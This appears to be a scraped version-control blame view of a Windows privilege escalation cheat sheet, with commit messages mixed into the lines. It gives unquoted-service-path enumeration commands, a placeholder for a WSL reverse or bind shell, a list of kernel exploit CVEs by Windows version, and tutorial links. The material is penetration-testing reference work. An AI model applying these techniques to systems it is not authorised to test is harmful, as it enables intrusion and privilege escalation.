 								wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								## Unquoted Service Paths
 								The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
 								```powershell
 								wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """
 								gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 								```
-												Linux - PrivEsc - First draft

											
										
										
											2018-12-25 14:51:11 +00:00
+								## Kernel Exploit
 								List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
 								##### #Security Bulletin&nbsp;&nbsp;&nbsp;#KB &nbsp;&nbsp;&nbsp;&nbsp;#Description&nbsp;&nbsp;&nbsp;&nbsp;#Operating System
 								- [MS17-017](./MS17-017) 　[KB4013081]　　[GDI Palette Objects Local Privilege Escalation]　　(windows 7/8)
 								- [CVE-2017-8464](./CVE-2017-8464) 　[LNK Remote Code Execution Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
 								- [CVE-2017-0213](./CVE-2017-0213) 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
 								- [CVE-2018-0833](./CVE-2018-0833)   [SMBv3 Null Pointer Dereference Denial of Service]    (Windows 8.1/Server 2012 R2)
 								- [CVE-2018-8120](./CVE-2018-8120)   [Win32k Elevation of Privilege Vulnerability]    (Windows 7 SP1/2008 SP2,2008 R2 SP1)
 								- [MS17-010](./MS17-010) 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)
 								- [MS16-135](./MS16-135) 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)
 								- [MS16-111](./MS16-111) 　[KB3186973]　　[kernel api]　　(Windows 10 10586 (32/64)/8.1)
 								- [MS16-098](./MS16-098) 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)
 								- [MS16-075](./MS16-075) 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)
 								- [MS16-034](./MS16-034) 　[KB3143145]　　[Kernel Driver]　　(2008/7/8/10/2012)
 								- [MS16-032](./MS16-032) 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)
 								- [MS16-016](./MS16-016) 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)
 								- [MS16-014](./MS16-014) 　[K3134228]　　[remote code execution]　　(2008/Vista/7)
 								...
 								- [MS03-026](./MS03-026) 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
-												Adding references sectio

											
										
										
											2018-12-24 14:02:50 +00:00
+								## References
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 								* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
-												PassTheTicket + OpenShare + Tools(CME example)

											
										
										
											2018-07-08 18:03:40 +00:00
+								* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
 								* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
-												Linux - PrivEsc - First draft

											
										
										
											2018-12-25 14:51:11 +00:00
+								* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
 								* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
 								* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
 								* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
 								* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
 								* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
 								* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
 								* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
 								* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
 								* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/)
 								* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
 								* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
 								* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
 								* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)